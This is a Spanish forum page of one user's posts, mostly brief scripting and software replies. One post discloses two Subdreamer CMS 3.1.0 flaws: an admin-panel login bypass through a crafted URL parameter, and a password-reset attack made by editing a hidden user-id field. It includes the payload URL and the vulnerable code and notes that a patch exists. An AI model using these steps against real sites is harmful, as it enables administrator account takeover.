Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - bizco

#391
el if no se repite, pero al entrar al bucle no hay nada que le haga salir y se queda pillado ahi.
#392
Scripting / Re: Script comparacion de archivos
12 Junio 2010, 17:32 PM
yo te diria que uses otro lenguaje de script con mas posibilidades, algo como python, tcl, perl.... o el que mas te guste.
#393
yo creo que si, tendrias que leer el formato PE para comprender esas cosas.
#394
si :), los encontre hace unos dias buscando pinceles y estos estan ordenados por carpetas.
#396
no, el efecto que intento es el escalon.
#397
gracias ahora los miro.
#398
Nivel Web / Subdreamer 3.1.0 varios bugs
6 Junio 2010, 22:34 PM

EDITO: acaban de sacar otro update que soluciona todos los fallos.

para el primero  hay parche, de obligatoria instalacion ya que por un fallo se podia acceder a todo el panel de administracion:

http://www.subdreamer.com/sdcms_310_patch.zip

con register_globals On, http://host/admin/pages.php?userinfo[adminaccess]=1 para navegar por el panel de administracion sin hacer login.

cambiar email y password de cualquier usuario, id 1 por defecto es administrador. necesitas estar registrado y modificar tu perfil, dando una ojeada al codigo html


<form action="http://localhost/index.php?categoryid=5" method="post" name="form">
<input type="hidden" value="4" name="p11_userid">


p11_userid es nuestro id de usuario, ahora miramos usercp.php


if(isset($_POST['email']) && strlen($_POST['email']))
   {
     
     $DB->query("UPDATE {users} SET email = '%s' WHERE userid = %d", $_POST['email'], $_POST['p11_userid']);
   }

   // change password?
   if(isset($_POST['newpassword']) && strlen($_POST['newpassword']))
   {

     $DB->query("UPDATE {users} SET password = '%s' WHERE userid = %d", md5($_POST['newpassword']), $_POST['p11_userid']);
   }


el id no se verifica en ningun momento, solo modificando el valor del campo oculto por 1 cambiaremos el password o email del administrador y podremos logearnos tranquilamente. versiones anteriores tb estan afectadas por estos errores.
#399
CitarPodria considerarse Malware perfectamente

malware si, pero no virus.
#400
sin entrar en si vale o no, es la estupidez mas grande. se crea un usuario con nombre de mujer pensando que le van a dar mas ayuda.....